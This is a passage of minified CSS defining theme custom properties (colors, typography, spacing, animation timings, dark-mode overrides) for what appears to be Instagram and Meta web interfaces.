0.35);--messenger-card-background:#FFFFFF;--messenger-card-box-shadow:0px 1px 2px 0px #0000001A;--mwp-header-background-color:var(--messenger-card-background);--mwp-header-button-color:var(--accent);--mwp-message-row-background:var(--messenger-card-background);--messenger-reply-background:#F0F2F5;--overlay-alpha-80:rgba(0, 0, 0, 0.65);--overlay-on-media:rgba(0, 0, 0, 0.6);--nav-bar-background:#FFFFFF;--popover-card-background:var(--card-background);--nav-bar-background-gradient:linear-gradient(to top, #FFFFFF, rgba(255,255,255.9), rgba(255,255,255,.7), rgba(255,255,255,.4), rgba(255,255,255,0));--nav-bar-background-gradient-wash:linear-gradient(to top, #F0F2F5, rgba(240,242,245.9), rgba(240,242,245,.7), rgba(240,242,245,.4), rgba(240,242,245,0));--negative:hsl(350, 87%, 55%);--negative-background:hsl(350, 87%, 55%, 20%);--new-notification-background:#E7F3FF;--non-media-pressed:rgba(68, 73, 80, 0.15);--non-media-pressed-on-dark:rgba(255, 255, 255, 0.3);--notification-badge:#e41e3f;--placeholder-icon:#65676B;--placeholder-image:rgb(164, 167, 171);--placeholder-text:#65676B;--placeholder-text-on-media:rgba(255, 255, 255, 0.5);--popover-background:#FFFFFF;--positive:#31A24C;--positive-background:#DEEFE1;--press-overlay:rgba(0, 0, 0, 0.10);--primary-button-background:#0095F6;--primary-button-icon:#FFFFFF;--primary-button-pressed:#77A7FF;--primary-button-text:#FFFFFF;--primary-deemphasized-button-background:rgba(0, 149, 246, 0.1);--primary-deemphasized-button-pressed:rgba(0, 149, 246, 0.05);--primary-deemphasized-button-pressed-overlay:rgba(0, 149, 246, 0.15);--primary-deemphasized-button-text:#0095F6;--primary-icon:#262626;--primary-text:#262626;--primary-text-on-media:#FFFFFF;--primary-web-focus-indicator:#D24294;--progress-ring-neutral-background:rgba(0, 0, 0, 0.2);--progress-ring-neutral-foreground:#000000;--progress-ring-on-media-background:rgba(255, 255, 255, 0.2);--progress-ring-on-media-foreground:#FFFFFF;--progress-ring-blue-background:rgba(24, 119, 242, 0.2);--progress-ring-blue-foreground:hsl(214, 89%, 52%);--progress-ring-disabled-background:rgba(190,195,201, 0.2);--progress-ring-disabled-foreground:#BEC3C9;--rating-star-active:#EB660D;--scroll-thumb:#BCC0C4;--scroll-shadow:0 1px 2px rgba(0, 0, 0, 0.1), 0 -1px rgba(0, 0, 0, 0.1) inset;--secondary-button-background:transparent;--secondary-button-background-floating:#ffffff;--secondary-button-background-on-dark:rgba(0, 0, 0, 0.4);--secondary-button-pressed:rgba(0, 0, 0, 0.05);--secondary-button-stroke:transparent;--secondary-button-text:#0095F6;--secondary-icon:#8E8E8E;--secondary-text:#8E8E8E;--secondary-text-on-media:rgba(255, 255, 255, 0.9);--section-header-text:#4B4C4F;--shadow-1:rgba(0, 0, 0, 0.1);--shadow-2:rgba(0, 0, 0, 0.2);--shadow-5:rgba(0, 0, 0, 0.5);--shadow-8:rgba(0, 0, 0, 0.8);--shadow-base:0 1px 2px var(--shadow-2);--shadow-elevated:0 8px 20px 0 rgba(0, 0, 0, 0.2), 0 2px 4px 0 rgba(0, 0, 0, 0.1);--shadow-emphasis:0 2px 12px var(--shadow-2);--shadow-inset:rgba(255, 255, 255, 0.5);--shadow-on-media:0px 0px 1px rgba(0, 0, 0, 0.62);--shadow-persistent:0px 0px 12px rgba(52, 72, 84, 0.05);--shadow-primary:0px 5px 12px rgba(52, 72, 84, 0.2);--shadow-responsive:0px 8px 16px 0px rgba(0, 0, 0, 0.1);--surface-background:#FFFFFF;--switch-active:hsl(214, 89%, 52%);--switch-inactive:#DBDBDB;--switch-unchecked-background-color:#8F9297;--text-highlight:rgba(24, 119, 242, 0.2);--input-background:#FFFFFF;--input-background-hover:var(--input-background);--input-background-warn-hover:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-hover:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-active:hsla(var(--accent-h), var(--accent-s), var(--accent-l), 0.05);--input-background-warn-active:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-active:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-disabled:#F0F2F5;--input-border-color:#CED0D4;--input-border-color-hover:var(--placeholder-text);--input-label-color-highlighted:hsl(214, 89%, 52%);--input-label-color-inside:var(--secondary-text);--input-label-color-error:var(--negative);--input-label-color-disabled:var(--disabled-text);--text-input-outside-label:#000000;--toast-background:#FFFFFF;--toast-text:#1C2B33;--toast-text-link:#216FDB;--toast-border-color:transparent;--toast-border-style:none;--toast-border-width:0px;--toggle-active-background:#E7F3FF;--toggle-active-icon:rgb(24, 119, 242);--toggle-active-text:rgb(24, 119, 242);--toggle-button-active-background:#E7F3FF;--tooltip-background:rgba(244, 244, 244, 0.8);--tooltip-box-shadow:0 2px 4px 0 var(--shadow-5);--popover-border-color:transparent;--wash:#FAFAFA;--web-wash:#FAFAFA;--warning:hsl(40, 89%, 52%);--chat-bubble-emphasis-ring-after:black;--chat-bubble-emphasis-ring-before:white;--chat-text-blockquote-color-background-line:rgba(0, 0, 0, 0.12);--chat-text-blockquote-color-text-primary-media:rgba(255, 255, 255, 0.7);--chat-incoming-message-bubble-background-color:#F0F0F0;--chat-outgoing-message-bubble-background-color:var(--accent);--chat-replied-message-background-color:rgba(0, 0, 0, 0.03);--radio-border-color:var(--primary-icon);--radio-border-color-disabled:var(--disabled-button-background);--radio-border-color-selected:var(--accent);--radio-checked-icon-color:var(--accent);--radio-checked-icon-color-disabled:var(--disabled-button-background);--dialog-anchor-vertical-padding:56px;--header-height:0px;--global-panel-width:0px;--global-panel-width-expanded:0px;--alert-banner-corner-radius:8px;--button-corner-radius:4px;--button-corner-radius-medium:10px;--button-corner-radius-large:12px;--button-height-large:40px;--button-height-medium:36px;--button-padding-horizontal-large:16px;--button-padding-horizontal-medium:16px;--button-padding-icon-only:16px;--button-icon-padding-large:16px;--button-icon-padding-medium:16px;--button-inner-icon-spacing-large:3px;--button-inner-icon-spacing-medium:3px;--blueprint-button-height-medium:40px;--blueprint-button-height-large:48px;--card-corner-radius:4px;--card-box-shadow:0 12px 28px 0 var(--shadow-2), 0 2px 4px 0 var(--shadow-1);--card-padding-horizontal:10px;--card-padding-vertical:20px;--chip-corner-radius:6px;--comment-bubble:18px;--dialog-corner-radius:8px;--glimmer-corner-radius:8px;--image-corner-radius:4px;--infochip-medium-radius:12px;--input-corner-radius:6px;--input-border-width:1px;--nav-list-cell-corner-radius:8px;--list-cell-corner-radius:8px;--list-cell-min-height:52px;--list-cell-padding-vertical:20px;--list-cell-padding-vertical-with-addon:14px;--menu-base-list-item-padding-horizontal:8px;--menu-base-list-item-padding-vertical:12px;--menu-base-size-full-margin-end:48px;--menu-item-base-margin-horizontal:8px;--menu-item-base-margin-vertical:0px;--menu-item-base-padding-horizontal:8px;--menu-item-base-overlay-radius:4px;--menu-item-base-padding-vertical:12px;--menu-item-base-with-icon-padding-horizontal:var(--menu-item-base-padding-horizontal);--separator-menu-item-margin-horizontal:16px;--separator-menu-item-margin-vertical:4px;--nav-list-cell-min-height:0px;--nav-list-cell-padding-vertical:16px;--nav-list-cell-padding-vertical-with-addon:16px;--nux-card-body-padding-end:24px;--page-footer-padding-vertical:16px;--popover-border-style:none;--popover-border-width:0px;--section-header-addOnEnd-margin-horizontal:8px;--section-header-addOnStart-margin-horizontal:12px;--section-header-addOnEnd-button-padding-horizontal:0px;--section-header-addOnEnd-button-padding-vertical:0px;--section-header-padding-vertical:16px;--section-header-subtitle-margin-vertical:14px;--section-header-subtitle-with-addOnEnd-margin-vertical:6px;--tab-height:60px;--tab-icon-padding-end:0px;--tab-text-icon-gap:4px;--tab-underline-color:transparent;--tab-underline-height:3px;--text-badge-corner-radius:4px;--text-badge-padding-horizontal:6px;--text-badge-padding-vertical:6px;--text-input-multi-padding-between-text-scrollbar:20px;--text-input-multi-padding-scrollbar:16px;--text-input-caption-margin-top:10px;--text-input-padding-vertical:12px;--toast-addon-padding-horizontal:6px;--toast-addon-padding-vertical:6px;--toast-container-max-width:100%;--toast-container-min-width:288px;--toast-container-padding-horizontal:10px;--toast-container-padding-vertical:16px;--toast-corner-radius:8px;--toaster-view-max-width:328px;--tooltip-corner-radius:8px;--typeahead-list-outer-padding-vertical:2px;--fds-animation-enter-exit-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-enter-exit-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-swap-shuffle-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-swap-shuffle-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-move-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-move-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-passive-move-in:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-passive-move-out:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-quick-move-in:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-quick-move-out:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-fade-in:cubic-bezier(0, 0, 1, 1);--fds-animation-fade-out:cubic-bezier(0, 0, 1, 1);--fds-duration-extra-extra-short-in:100ms;--fds-duration-extra-extra-short-out:100ms;--fds-duration-extra-short-in:200ms;--fds-duration-extra-short-out:150ms;--fds-duration-short-in:280ms;--fds-duration-short-out:200ms;--fds-duration-medium-in:400ms;--fds-duration-medium-out:350ms;--fds-duration-long-in:500ms;--fds-duration-long-out:350ms;--fds-duration-extra-long-in:1000ms;--fds-duration-extra-long-out:1000ms;--fds-duration-none:0ms;--fds-fast:200ms;--fds-slow:400ms;--font-family-apple:system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif;--font-family-code:ui-monospace, Menlo, Consolas, Monaco, monospace;--font-family-default:Helvetica, Arial, sans-serif;--font-family-segoe:Segoe UI Historic, Segoe UI, Helvetica, Arial, sans-serif;--body-font-family:Placeholder Font;--body-font-size:0.9375rem;--body-font-weight:400;--body-line-height:1.3333;--body-emphasized-font-family:Placeholder Font;--body-emphasized-font-size:0.9375rem;--body-emphasized-font-weight:600;--body-emphasized-line-height:1.3333;--headline1-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline1-font-size:1.75rem;--headline1-font-weight:700;--headline1-line-height:1.2143;--headline2-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline2-font-size:1.5rem;--headline2-font-weight:700;--headline2-line-height:1.25;--headline3-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline3-font-size:1.0625rem;--headline3-font-weight:700;--headline3-line-height:1.2941;--meta-font-family:Placeholder Font;--meta-font-size:0.8125rem;--meta-font-weight:400;--meta-line-height:1.3846;--meta-emphasized-font-family:Placeholder Font;--meta-emphasized-font-size:0.8125rem;--meta-emphasized-font-weight:600;--meta-emphasized-line-height:1.3846;--primary-label-font-family:Optimistic Display Medium, system-ui, sans-serif;--primary-label-font-size:1.0625rem;--primary-label-font-weight:500;--primary-label-line-height:1.2941;--secondary-label-font-family:Placeholder Font;--secondary-label-font-size:0.9375rem;--secondary-label-font-weight:500;--secondary-label-line-height:1.3333;--tertiary-label-font-family:Placeholder Font;--tertiary-label-font-size:0.6875rem;--tertiary-label-font-weight:500;--tertiary-label-line-height:1.4545;--text-input-field-font-family:Placeholder Font;--text-input-field-font-size:1rem;--text-input-field-font-stretch:initial;--text-input-field-font-weight:500;--text-input-field-line-height:1.2941;--text-input-label-font-family:Placeholder Font;--text-input-label-font-size:17px;--text-input-label-font-size-scale-multiplier:0.75;--text-input-label-font-stretch:initial;--text-input-label-font-weight:400;--text-input-label-line-height:1.2941;--messenger-card-min-width:300px;--messenger-card-max-width:480px;--messenger-application-max-width:2560px;--messenger-sidebar-collapsed-width:44px;--messenger-sidebar-expanded-width:240px;--messenger-card-corner-radius:8px;--messenger-card-spacing:16px;--chat-bubble-padding-vertical:8px;--chat-bubble-padding-horizontal:12px;--chat-bubble-border-radius:18px;--dialog-size-medium-width:100%;--dialog-size-small-width:100%;--focus-ring-outline-forced-colors:2px auto transparent !important;--focus-ring-outline-link:2px auto var(--focus-ring-blue);--focus-ring-shadow-default:0 0 0 2px var(--always-white), 0 0 0 4px var(--focus-ring-blue);--focus-ring-shadow-inset:0 0 0 2px var(--focus-ring-blue) inset, 0 0 0 4px var(--always-white) inset;--glimmer-animation-direction:alternate;--glimmer-animation-duration:1000ms;--glimmer-animation-timing-function:steps(10, end);--glimmer-opacity-min:0.25;--glimmer-opacity-max:1;--radio-checked-icon-size-large:12px;--radio-checked-icon-size-medium:12px;--radio-border-width:2px;--radio-size-large:24px;--radio-size-medium:20px;--blue-primary:rgb(0,136,244);--blue-secondary:rgb(4,59,114);--blue-tertiary:rgb(235,245,255);--chartreuse-primary:rgb(106,147,22);--chartreuse-secondary:rgb(50,65,19);--chartreuse-tertiary:rgb(226,255,152);--cyan-primary:rgb(0,142,213);--cyan-secondary:rgb(15,63,93);--cyan-tertiary:rgb(231,245,255);--dataviz-primary-2:rgb(156,219,255);--dataviz-primary-3:rgb(73,156,255);--dataviz-secondary-1:rgb(83,78,191);--dataviz-secondary-2:rgb(103,96,228);--dataviz-secondary-3:rgb(119,45,88);--dataviz-supplementary-1:rgb(253,91,67);--dataviz-supplementary-2:rgb(161,132,0);--dataviz-supplementary-3:rgb(36,131,44);--dataviz-supplementary-4:rgb(51,51,52);--fuschia-primary:rgb(250,45,138);--fuschia-secondary:rgb(118,14,62);--fuschia-tertiary:rgb(255,241,246);--green-primary:rgb(43,154,53);--green-secondary:rgb(26,68,27);--green-tertiary:rgb(227,250,224);--magenta-primary:rgb(215,77,204);--magenta-secondary:rgb(96,36,91);--magenta-tertiary:rgb(255,239,254);--orange-primary:rgb(208,108,20);--orange-secondary:rgb(94,49,14);--orange-tertiary:rgb(255,241,239);--purple-primary:rgb(125,116,255);--purple-secondary:rgb(55,50,121);--purple-tertiary:rgb(245,241,255);--red-primary:rgb(251,60,68);--red-secondary:rgb(118,22,27);--red-tertiary:rgb(255,241,239);--teal-primary:rgb(0,152,124);--teal-secondary:rgb(10,68,56);--teal-tertiary:rgb(227,247,241);--yellow-primary:rgb(161,132,0);--yellow-secondary:rgb(72,59,12);--yellow-tertiary:rgb(255,246,161);--base-unit:4px;--blue-0:245, 251, 255;--blue-1:224, 241, 255;--blue-2:179, 219, 255;--blue-3:112, 188, 255;--blue-4:71, 175, 255;--blue-5:0, 149, 246;--blue-6:0, 116, 204;--blue-7:0, 87, 163;--blue-8:0, 55, 107;--blue-9:0, 41, 82;--breakpoint-medium-width:1536px;--breakpoint-small-width:1024px;--challenge-width:460px;--creation-header-height:43px;--creation-min-padding-x:32px;--creation-modal-max-height:898px;--creation-modal-min-height:391px;--creation-padding-x:64px;--creation-padding-y:112px;--creation-settings-width:340px;--cyan-5:39, 196, 245;--desktop-grid-item-margin:28px;--desktop-grid-item-margin-slim:4px;--desktop-in-feed-story-item-height:208px;--desktop-in-feed-story-item-width:116px;--desktop-nav-height:60px;--desktop-skinny-nav-height:60px;--desktop-story-tray-bottom-margin:48px;--desktop-story-tray-bottom-margin-denser:24px;--direct-attachment-image-grid-item-size:78px;--direct-attachment-story-height:150px;--direct-attachment-story-large-height:256px;--direct-attachment-story-large-width:164px;--direct-attachment-story-width:84px;--direct-message-max-width:236px;--fb-signup-page-profile-pic-size:88px;--feed-sidebar-padding:32px;--feed-sidebar-width:319px;--feed-width:470px;--feed-width-wide-story:630px;--feed-width-wide-story-prism:702px;--font-family-system:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-family-system-prism:"Instagram Sans UI", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-weight-system-bold:700;--font-weight-system-extra-bold:800;--font-weight-system-extra-light:200;--font-weight-system-light:300;--font-weight-system-medium:500;--font-weight-system-regular:400;--font-weight-system-semibold:600;--footer-width-wide:1150px;--gradient-lavender:211, 0, 197;--gradient-orange:255, 122, 0;--gradient-pink:255, 1, 105;--gradient-purple:118, 56, 250;--gradient-red:255, 48, 64;--gradient-yellow:255, 214, 0;--green-4:120, 222, 69;--green-5:88, 195, 34;--green-6:55, 166, 0;--grey-0:245, 245, 245;--grey-1:239, 239, 239;--grey-2:219, 219, 219;--grey-3:199, 199, 199;--grey-4:168, 168, 168;--grey-5:142, 142, 142;--grey-6:115, 115, 115;--grey-7:85, 85, 85;--grey-8:54, 54, 54;--grey-9:38, 38, 38;--grey-10:26, 26, 26;--grey-0-prism:248, 249, 249;--grey-1-prism:243, 245, 247;--grey-2-prism:233, 237, 240;--grey-3-prism:219, 223, 228;--grey-4-prism:162, 170, 180;--grey-5-prism:131, 137, 147;--grey-6-prism:111, 118, 128;--grey-7-prism:94, 100, 109;--grey-8-prism:50, 53, 57;--grey-9-prism:41, 41, 46;--grey-10-prism:33, 35, 38;--ig-badge:255, 48, 64;--ig-close-friends-refreshed:28, 209, 79;--ig-disabled-action-text:169, 219, 255;--ig-error-or-destructive:237, 73, 86;--ig-facebook-blue:53, 121, 234;--ig-live-badge:255, 1, 105;--ig-primary-button:0, 149, 246;--ig-primary-button-hover:24, 119, 242;--ig-secondary-icon:142, 142, 142;--ig-stroke-on-media:255, 255, 255;--ig-tertiary-button-background:255, 255, 255;--ig-tertiary-button-border:219, 219, 219;--ig-tertiary-button-hover:245, 245, 245;--ig-tertiary-button-text:38, 38, 38;--ig-subscribers-only:118, 56, 250;--ig-success:88, 195, 34;--ig-text-on-color:255, 255, 255;--ig-text-on-media:255, 255, 255;--in-feed-story-item-height:240px;--in-feed-story-item-width:135px;--in-feed-story-item-padding:12px;--input-border-radius:6px;--large-layout-min:1500px;--live-video-border-radius:4px;--media-content-card-width:350px;--media-content-card-width-small:300px;--media-info:335px;--medium-layout-max:1499px;--medium-layout-min:1080px;--medium-screen-max:875px;--medium-screen-min:736px;--mobile-grid-item-margin:2px;--mobile-nav-height:45px;--modal-backdrop-dark:rgba(0, 0, 0, 0.85);--modal-backdrop-default:rgba(0, 0, 0, 0.65);--modal-border-radius:12px;--modal-padding:16px;--modal-z-index:100;--nav-narrow-width:72px;--nav-medium-width:244px;--nav-wide-width:335px;--nav-bottom-screen-max:767px;--nav-narrow-screen-min:768px;--nav-medium-screen-min:1264px;--nav-wide-screen-min:1920px;--orange-5:253, 141, 50;--photo:600px;--pink-5:209, 8, 105;--polaris-feed-with-padding-threshold-min:640px;--polaris-extra-small-screen-max:413px;--polaris-small-screen-min:414px;--polaris-small-screen-max:735px;--polaris-medium-screen-min:736px;--polaris-medium-screen-max:875px;--polaris-large-screen-min:876px;--polaris-nav-bottom-screen-max:767px;--polaris-post-modal-small-screen-max:1366px;--polaris-post-modal-large-screen-min:1536px;--polaris-post-modal-large-height-max:1032px;--polaris-challenge-width:460px;--polaris-breakpoint-medium-width:1536px;--polaris-breakpoint-small-width:1024px;--polaris-site-width-narrow:600px;--polaris-site-width-wide:935px;--polaris-site-padding-top:30px;--purple-5:163, 7, 186;--red-4:255, 104, 116;--red-5:237, 73, 86;--red-6:198, 35, 48;--red-7:167, 3, 17;--reels-large-screen-min:1366px;--refinement-section-height:50px;--revamp-nav-bottom-toolbar-height:50px;--revamp-feed-card-max-height:835px;--revamp-feed-card-min-height:615px;--revamp-feed-card-media-min-width:390px;--revamp-feed-card-dense-padding:16px;--revamp-feed-item-spacing:20px;--revamp-feed-horizontal-padding-small-screen:24px;--revamp-feed-horizontal-padding-large-screen:32px;--revamp-feed-vertical-padding:32px;--right-rail-width:300px;--scrollable-content-header-height-large:56px;--scrollable-content-header-height-med:49px;--scrollable-content-header-height:44px;--search-box-height:40px;--search-modal-height-expanded:450px;--search-modal-height:362px;--search-modal-top-offset:12px;--search-result-height:50px;--search-result-inline-top-offset:60px;--search-result-list-width:375px;--site-width-narrow:600px;--site-width-wide:935px;--small-layout-max:1079px;--small-layout-min:800px;--small-screen-max:735px;--small-screen-min:414px;--story-progressbar-update-tick:0.1s;--story-swap-animation-duration:350ms;--system-10-font-size:10px;--system-10-line-height:12px;--system-11-font-size:11px;--system-11-line-height:13px;--system-12-font-size:12px;--system-12-line-height:16px;--system-14-font-size:14px;--system-14-line-height:18px;--system-16-font-size:16px;--system-16-line-height:20px;--system-18-font-size:18px;--system-18-line-height:24px;--system-20-font-size:20px;--system-20-line-height:25px;--system-22-font-size:22px;--system-22-line-height:26px;--system-24-font-size:24px;--system-24-line-height:27px;--system-26-font-size:26px;--system-26-line-height:28px;--system-28-font-size:28px;--system-28-line-height:32px;--system-30-font-size:30px;--system-30-line-height:36px;--system-32-font-size:32px;--system-32-line-height:40px;--web-always-black:0, 0, 0;--web-always-white:255, 255, 255;--web-overlay-on-media:38, 38, 38;--web-prism-black:15, 20, 25;--web-secondary-action:224, 241, 255;--yellow-5:253, 203, 92;--barcelona-logo:0, 0, 0;--challenge-link:54, 54, 54;--ig-banner-background:255, 255, 255;--ig-elevated-background:255, 255, 255;--ig-elevated-highlight-background:239, 239, 239;--ig-elevated-separator:219, 219, 219;--ig-focus-stroke:168, 168, 168;--ig-highlight-background:239, 239, 239;--ig-hover-overlay:0, 0, 0, 0.05;--ig-link:0, 55, 107;--ig-primary-background:255, 255, 255;--ig-primary-icon:38, 38, 38;--ig-primary-text:0, 0, 0;--ig-secondary-background:245, 245, 245;--ig-secondary-button:38, 38, 38;--ig-secondary-button-background:239, 239, 239;--ig-secondary-button-hover:219, 219, 219;--ig-secondary-text:115, 115, 115;--ig-separator:219, 219, 219;--ig-stroke:219, 219, 219;--ig-temporary-highlight:245, 251, 255;--ig-tertiary-icon:199, 199, 199;--ig-tertiary-text:199, 199, 199;--post-separator:239, 239, 239;--tos-box-shadow:0, 0, 0;--ig-toggle-background-on-prism:15, 20, 25;--ig-toggle-background-off-prism:219, 223, 228;--ig-toggle-background-disabled-on-prism:162, 170, 180;--ig-toggle-background-disabled-off-prism:233, 237, 240;--ig-toggle-outline-prism:219, 223, 228;--ig-toggle-outline-disabled-prism:243, 245, 247;--ig-stroke-prism:255, 255, 255;--ig-stroke-disabled-on-prism:233, 237, 240;--ig-stroke-disabled-off-prism:248, 249, 249;--ig-dropdown-background:243, 245, 247;}@media (prefers-color-scheme: dark){:root {--fds-black:black;--fds-black-alpha-05:rgba(0, 0, 0, 0.05);--fds-black-alpha-10:rgba(0, 0, 0, 0.1);--fds-black-alpha-15:rgba(0, 0, 0, 0.15);--fds-black-alpha-20:rgba(0, 0, 0, 0.2);--fds-black-alpha-30:rgba(0, 0, 0, 0.3);--fds-black-alpha-40:rgba(0, 0, 0, 0.4);--fds-black-alpha-50:rgba(0, 0, 0, 0.5);--fds-black-alpha-60:rgba(0, 0, 0, 0.6);--fds-black-alpha-80:rgba(0, 0, 0, 0.8);--fds-blue-05:black;--fds-blue-30:black;--fds-blue-40:black;--fds-blue-60:black;--fds-blue-70:black;--fds-blue-80:black;--fds-button-text:black;--fds-comment-background:black;--fds-dark-mode-gray-35:black;--fds-dark-mode-gray-50:black;--fds-dark-mode-gray-70:black;--fds-dark-mode-gray-80:black;--fds-dark-mode-gray-90:black;--fds-dark-mode-gray-100:black;--fds-gray-00:black;--fds-gray-05:black;--fds-gray-10:black;--fds-gray-20:black;--fds-gray-25:black;--fds-gray-30:black;--fds-gray-45:black;--fds-gray-70:black;--fds-gray-80:black;--fds-gray-90:black;--fds-gray-100:black;--fds-green-55:black;--fds-green-65:black;--fds-highlight:black;--fds-highlight-cell-background:black;--fds-primary-icon:white;--fds-primary-text:white;--fds-red-55:black;--fds-soft:cubic-bezier(.08,.52,.52,1);--fds-spectrum-aluminum-tint-70:black;--fds-spectrum-blue-gray-tint-70:black;--fds-spectrum-cherry:black;--fds-spectrum-cherry-tint-70:black;--fds-spectrum-grape-tint-70:black;--fds-spectrum-grape-tint-90:black;--fds-spectrum-lemon-dark-1:black;--fds-spectrum-lemon-tint-70:black;--fds-spectrum-lime:black;--fds-spectrum-lime-tint-70:black;--fds-spectrum-orange-tint-70:black;--fds-spectrum-orange-tint-90:black;--fds-spectrum-seafoam-tint-70:black;--fds-spectrum-slate-dark-2:black;--fds-spectrum-slate-tint-70:black;--fds-spectrum-teal:black;--fds-spectrum-teal-dark-1:black;--fds-spectrum-teal-dark-2:black;--fds-spectrum-teal-tint-70:black;--fds-spectrum-teal-tint-90:black;--fds-spectrum-tomato:black;--fds-spectrum-tomato-tint-30:black;--fds-spectrum-tomato-tint-90:black;--fds-strong:cubic-bezier(.12,.8,.32,1);--fds-unified-blue-35:black;--fds-unified-gray-20:black;--fds-white:black;--fds-white-alpha-05:rgba(255, 255, 255, 0.05);--fds-white-alpha-10:rgba(255, 255, 255, 0.1);--fds-white-alpha-20:rgba(255, 255, 255, 0.2);--fds-white-alpha-30:rgba(255, 255, 255, 0.3);--fds-white-alpha-40:rgba(255, 255, 255, 0.4);--fds-white-alpha-50:rgba(255, 255, 255, 0.5);--fds-white-alpha-60:rgba(255, 255, 255, 0.6);--fds-white-alpha-80:rgba(255, 255, 255, 0.8);--fds-yellow-20:black;--accent:#0095F6;--always-white:white;--always-black:black;--always-dark-gradient:linear-gradient(rgba(0,0,0,0), rgba(0,0,0,0.6));--always-dark-overlay:rgba(0, 0, 0, 0.4);--always-light-overlay:rgba(255, 255, 255, 0.4);--always-gray-40:#65676B;--always-gray-75:#BCC0C4;--always-gray-95:#F0F2F5;--attachment-footer-background:rgba(255,255,255,0.1);--background-deemphasized:rgba(255,255,255,0.1);--badge-background-color-blue:var(--accent);--badge-background-color-dark-gray:var(--secondary-icon);--badge-background-color-gray:var(--disabled-icon);--badge-background-color-green:var(--positive);--badge-background-color-light-blue:var(--highlight-bg);--badge-background-color-red:var(--notification-badge);--badge-background-color-yellow:var(--base-lemon);--base-blue:#1877F2;--base-cherry:#F3425F;--base-grape:#9360F7;--base-lemon:#F7B928;--base-lime:#45BD62;--base-pink:#FF66BF;--base-seafoam:#54C7EC;--base-teal:#2ABBA7;--base-tomato:#FB724B;--text-badge-info-background:hsl(214, 100%, 59%);--text-badge-success-background:#31A24C;--text-badge-attention-background:hsl(40, 89%, 52%);--text-badge-critical-background:#e41e3f;--blue-link:#00376B;--border-focused:#8A8D91;--card-background:#242526;--card-background-flat:#323436;--comment-background:#3A3B3C;--comment-footer-background:#4E4F50;--dataviz-primary-1:rgb(0,174,143);--disabled-button-background:rgba(255, 255, 255, 0.2);--disabled-button-text:rgba(255, 255, 255, 0.3);--disabled-icon:rgba(255, 255, 255, 0.3);--disabled-text:rgba(255, 255, 255, 0.3);--divider:#3E4042;--event-date:#F3425F;--fb-wordmark:#FFFFFF;--fb-logo:#0866FF;--filter-accent:invert(40%) sepia(52%) saturate(200%) saturate(200%) saturate(200%) saturate(189%) hue-rotate(191deg) brightness(103%) contrast(102%);--filter-always-white:invert(100%);--filter-disabled-icon:invert(100%) opacity(30%);--filter-placeholder-icon:invert(59%) sepia(11%) saturate(200%) saturate(135%) hue-rotate(176deg) brightness(96%) contrast(94%);--filter-primary-accent:invert(40%) sepia(52%) saturate(200%) saturate(200%) saturate(200%) saturate(189%) hue-rotate(191deg) brightness(103%) contrast(102%);--filter-primary-icon:invert(89%) sepia(6%) hue-rotate(185deg);--filter-secondary-button-icon-on-media:invert(100%);--filter-secondary-icon:invert(62%) sepia(98%) saturate(12%) hue-rotate(175deg) brightness(90%) contrast(96%);--filter-warning-icon:invert(77%) sepia(29%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(128%) hue-rotate(359deg) brightness(102%) contrast(107%);--filter-blue-link-icon:invert(73%) sepia(29%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(103.25%) hue-rotate(189deg) brightness(101%) contrast(101%);--filter-positive:invert(37%) sepia(61%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(115%) hue-rotate(91deg) brightness(97%) contrast(105%);--filter-primary-deemphasized-button-icon:brightness(0) saturate(100%) invert(63%) sepia(20%) saturate(1290%) hue-rotate(185deg) brightness(107%) contrast(101%);--filter-negative:invert(25%) sepia(33%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(110%) hue-rotate(345deg) brightness(132%) contrast(96%);--focus-ring-blue:#1877F2;--glimmer-spinner-icon:white;--hero-banner-background:#E85D07;--hosted-view-selected-state:rgba(45, 136, 255, 0.1);--highlight-bg:rgba(24, 119, 242, .31);--hover-overlay:rgba(255, 255, 255, 0.1);--inverse-text:var(--always-white);--list-cell-chevron:#B0B3B8;--media-hover:rgba(68, 73, 80, 0.15);--media-inner-border:rgba(255, 255, 255, 0.05);--media-outer-border:#33363A;--media-pressed:rgba(68, 73, 80, 0.35);--messenger-card-background:#242526;--messenger-card-box-shadow:0px 0px 16px rgba(0, 0, 0, 0.3);--mwp-header-background-color:var(--messenger-card-background);--mwp-header-button-color:var(--accent);--mwp-message-row-background:var(--messenger-card-background);--messenger-reply-background:#18191A;--overlay-alpha-80:rgba(0, 0, 0, 0.65);--overlay-on-media:rgba(0, 0, 0, 0.6);--nav-bar-background:#242526;--popover-card-background:var(--card-background);--nav-bar-background-gradient:linear-gradient(to top, #242526, rgba(36,37,38,.9), rgba(36,37,38,.7), rgba(36,37,38,.4), rgba(36,37,38,0));--nav-bar-background-gradient-wash:linear-gradient(to top, #18191A, rgba(24,25,26,.9), rgba(24,25,26,.7), rgba(24,25,26,.4), rgba(24,25,26,0));--negative:hsl(350, 87%, 55%);--negative-background:hsl(350, 87%, 55%, 